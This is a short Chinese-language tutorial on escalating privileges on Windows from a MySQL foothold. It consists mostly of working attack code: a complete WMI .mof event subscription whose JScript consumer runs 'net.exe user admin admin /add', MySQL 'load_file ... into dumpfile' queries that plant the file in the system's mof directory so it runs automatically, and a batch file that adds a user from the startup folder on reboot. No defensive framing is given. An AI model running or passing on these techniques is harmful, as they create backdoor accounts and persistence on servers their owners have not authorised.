Mof提權的利用方法
将代碼儲存為.mof檔案
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
在mysql中執行下面,通過查詢将檔案導入
select load_file(’.mof檔案的路徑’) into dumpfile ‘c:/windows/system32/wbem/mof/.mof(你生成的檔案名)’;
導入成功後系統會自動運作該檔案。
啟動項提權
@echo
net user dodo dodo /add
将代碼儲存儲存成 .bat檔案
通過查詢将檔案導入
select load_file(’.bat檔案的路徑’) into dumpfile ‘該系統的啟動項目錄’;
當系統重新開機時 就會生效